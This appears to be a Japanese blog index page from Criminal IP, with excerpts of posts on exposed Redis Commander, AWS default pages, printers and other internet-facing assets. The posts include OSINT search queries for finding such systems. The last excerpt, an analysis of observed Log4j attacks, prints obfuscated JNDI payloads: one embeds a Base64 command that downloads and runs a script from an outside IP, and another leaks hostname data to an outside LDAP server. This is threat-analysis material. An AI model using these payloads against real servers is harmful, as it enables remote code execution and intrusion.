漏洩されたRedis Commanderが招くデータ侵害事故

Redis(Remote Dictionary Server)とは、2009年Salvatore Sanfilippoによって開発されたBSDライセンス基盤のオープンソースプロジェクトで、キーを介した完全一致の検索を通じてデータを照会するキー・バリュー型 データベース です。RedisはメモリーベースのDBMSであるため、一般ディスクのストレージを使う データベース に比べてより速いスピードを保証します。Hashes、List、Setなどの様々な資料型を扱い、データを柔軟に管理できるため、多くのところで使われています。代表的には主に、Facebook、Instagram、Tumblr、KakaoTalkなど、大量のメッセージをリアルタイムで処理すべきのシステムでResult Cacheとデータを保存するに使われています。さらに、小規模のサービスおよび早いレスポンスの処理のためのシステムでストレージとして使用されています。 漏洩されたRedis Commander が招かれるデータ侵害事故 Redis CommanderとはRedisサーバーに保存されているデータベースを管理するに使えるNode.jsウェブアプリケーションです。Redisのすべてのデータ型をウェブ基盤で編集でき、自動完成機能と文書の入出力機能を通じてエンジニアの利便性を高めるGUIツールです。一方、認証もないまま外部に漏洩されたRedis Commanderはハッカーにとって便利なリモートデータの乗っ取りツールとして使われる可能性もあります。このようなRedis データベース の特性で、外部に漏洩されているRedis Commanderは不認可の外部ユーザーにもすべてのデータベースに対するコントロール権を渡せます。これは、非常に深刻なデータ侵害の事故へつながれることです。 ファビコンでRedis Commanderサーバーを見つける方

クラウド攻撃対象領域:放置された有効なAWS資産検知

AWSのようなクラウド攻撃対象領域でも数多くのシステムがデフォルトページのまま、放置されています。AWSクラウド資産の特性をよく理解しているエンジニアやAWSのデフォルトページを見たことがある方々は関連するキーワードを使い、OSINT(Open Source Intelligence)検索でデフォルトページ状態の放置されたシステムを簡単に検知できます。AWSもやはり、特定の製品名を知らなくてもいくつのキーワードで クラウド攻撃対象領域 を見つけられます。 今回の投稿は以前掲載されたデフォルトページ漏洩で発生するセキュリティ脅威と続く内容なので、前回の投稿を先に読むことをお勧めします。 放置されたAWS資産で クラウド攻撃対象領域 を検知 代表的なキーワードとして"Instance data"があります。クラウドにはVMインスタンスが多く使われているため、単純にこのキーワードを検索してみても、デフォルト状態のAWSシステムをたくさん見つけられます。 https://www.criminalip.io/ja/asset/search?query=%22Instance+data%22 "Instance data" "Instance data"キーワードで検索した放置されているAWSクラウド攻撃対象領域サーバー 下のスクリーンショットをみると、Instance dataのデフォルトページにはVMインスタンスのID、Private

攻撃対象領域管理 (ASM)、LogpressoのCriminal IP統合

SOAR(Security Orchestration, Automation and Response、ソア)フラットホームのLogpressoにCriminal IPが統合されました。Criminal IPで提供するAPIを通じてLogpressoのダッシュボードでCriminal IP攻撃対象領域管理を行うことができるようになり、 攻撃対象領域 にさらされたIT資産の自動モニタリングとVPN、Tor、Proxy IPの可否をご確認できます。 Criminal IP攻撃対象領域管理を支援するプラットホーム Logpresso Standard Logpresso Enterprise Logpresso Sonar Logpresso

By |2022-11-22T12:59:03+09:002022-08-25|Tags: , , , |0 Comments

デフォルトページ漏洩で発生するセキュリティ脅威

デフォルトページ とは、システムが活性化された状態で攻撃対象領域に放置された初期設定のページを意味します。 全てのシステムは設置してから最初に稼働されるデフォルトページがあります。デフォルトページでは初期システムを設定するなど、様々な設定作業を行えます。 ハッカーがデフォルトページ漏洩の脆弱性を見つける方法 攻撃対象領域には思ったより多くのシステムが何の設定もされないまま、デフォルト状態で放置されています。このようなデフォルトページにはハッカーが好む情報がたくさんあり、数多くのセキュリティ脅威はこのようなデフォルトページから発生します。 まずは、ハッカーが漏洩されたデフォルトページを通じてターゲットのインフラ情報を探し、分析する過程を調べてみました。デフォルトページは設置する際、基本的には見られるページとエラー発生のメッセージが示されるページがあります。Criminal IP(https://www.criminalip.io/ja)検索エンジンでクラウドサービスに関する様々なデフォルトページをいくつの検索フィルターを通じて見つけられます。 システムを少しでも運営した経験がある場合、アプリケーションの情報を知らなくても、基本的な常識だけでデフォルトページを見つけられます。基本的にCIPのIT資産検索(https://www.criminalip.io/ja/asset)で管理者ページまたは、デフォルトページにありそうなキーワードである‘System Information’を検索できます。公開されたウェブサーバーのみを検索するためには、‘System Information’キーワードと共にサーバーのステータスコードが200である場合のみをフィルタリングして検索できます。さらに、各国名コード(Country Code)と特定のサービスのポート番号で組み合わせると、より興味深い検索結果が出ます。 https://www.criminalip.io/ja/asset/search?query=%22System%20Information%22%20status_code:%22200%22 "System Information" status_code:"200" Criminal IPで System Information

攻撃対象領域管理 : 未知の資産及び脆弱性の検知

企業と公共機関には数多くのネットワーク デバイスと DB、サーバー、アプリケーション、ドメインが存在します。このような全ての IT 資産は IP アドレスとポートで運営されています。ハッカーは開いているポートを探し、その中にも脆弱性があるサーバーを狙います。従って、ハッカーの狙いにならないように「 攻撃対象領域管理 (ASM)」はかけがえのないことです。過去にはデータセンターで全ての資産が集められていたが、現在の企業の資産はクラウド、支社または、子会社への分離、M&Aなどで分散されて複雑になりました。すなわち、攻撃者が侵入できる経路も多様になることを示します。  分散されて複雑になる企業の IT 資産の 攻撃対象領域 Criminal IP (https://www.criminalip.io/ja) はインターネットにつながれている全ての資産を含むインテリジェンスを提供します。CIP の会員に提供される

ファビコン ハッシュでフィッシング及び脆弱なアプリケーション IP アドレスの検知

ファビコン (Favicon) とは favorites + icon の 複合語で ウェブサイトを 代表する アイコンです。ファビコンが 適用された ウェブサイトへ アクセスすると、ブラウザの アドレスバーの 上の タップで アクセスした ウェブサイトの ファビコン(favicon)とタイトル(title)が表します。ほぼ全ての

複合機脆弱性 イシュー:プリントしたファイルがネットで漏洩される理由

自分の履歴書、住民票やマイナンバーカードのコピ、成績表などのがネットで広がっていると思うとどんな気分になりますか。 プリンタ複合機(MFP、Multi-Function Printers)を利用してあらゆる重要な個人情報をスキャンし、役所などに提出することは企業や個人、誰にでも起こる日常的な出来事です。このような重要な個人情報のスキャンファイルをオンラインで転送したり、メール、OneDrive、Dropboxなどでリンクを添付したりする場合、zip パスワードをかけたり、ダウンロードの期限制限を設定したりするなど、様々な情報セキュリティ政策に従ってファイルを送ります。 しかし、プリンタ複合機そのままのセキュリティに関してはあまり無神経な場合がたくさんあります。全ての複合機には下のような管理者ページがあり、このページにアクセスすると、誰かがスキャンしたファイルが残っている場合があります。SMB プロトコルを用いてスキャンされたファイルをシェアフォルダへコピスる機能を使った後、または、メールで転送したファイルがそのまま残される場合があります。 その上、さらに大きい問題は個人や企業の複合機(MFP)にログイン認証をしなくてもスキャンフォルダにアクセスできる場合が多いことです。これによってスキャンファイルだけではなく、ファックスの受信リストに残されている受信者メール情報が漏洩されるなど追加的な個人情報漏れのセキュリティ事故が発生しています。 複合機(MFP)管理者ページの画面 複合機(MFP)管理者ページで提供する受信者情報ページ インターネットに漏洩されている 複合機脆弱性 このような複合機(MFP)イシューは企業内のオフィス網でも問題として注目されているが、更に深刻な点はこの複合機がインターネットの外部につながっているところです。次のスクリーンショットは Criminal IP のアセット検索で port:631

Criminal IPで分析したLog4jの攻撃パターン

Log4jの脆弱性が世界を襲った。ハッカーは、サーバーを丸ごと奪うためにLog4jの脆弱性に感染されたサーバーを見つけ、世界中のすべてのサーバーを毎日スキャンしています。ハッカーがlog4jの脆弱性を持っているサーバーを見つけるためにどのスキャン技術を使用しているかを調べました。 攻撃者は最も単純な方法で "${jndi:ldap://***.*.**.***:53/c}" パケットを送信し、サーバーの反応を調べます。しかし、このパターンはメディアなどにあまりにも多く公開されてきており、IDS・IPSで素早く検出されてブロックされています。したがって、下表のような変形した攻撃が使用されています。変更された攻撃パケットは、jndi:ldap のシグネチャを検出しないように j}ndi, {${::-j}${::-n}${::-d}${::-i}:${ ::-l}${::-d}${::-a}${::-p}, ${jndi:${lower:l}${lower:d}a${lower:p} などの形でペイロードを分割して送信する方法を使用します。   Log4jの一般的な攻撃パターン  ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" ""t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//***.**.**.***:2420/TomcatBypass/Command/Base64/d2dldCA0Ni4xNjEuNTIuMzcvRXhwbG9pdC5zaDsgY2htb2QgK3ggRXhwbG9pdC5zaDsgLi9FeHBsb2l0LnNoOyBybSAtcmYgRXhwbG9pdC5zaA==}')"" 8080" "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F45.12.32.61%3A1389%2FOS%3D%24%7Bsys%3Aos.name%7D%2FHN%3D%24%7Benv%3AHOSTNAME%7D%2Ffeb12a13-5fe3-429a-bd12-ed0c72e2ad20%7D HTTP/1.1"" 403 152

Go to Top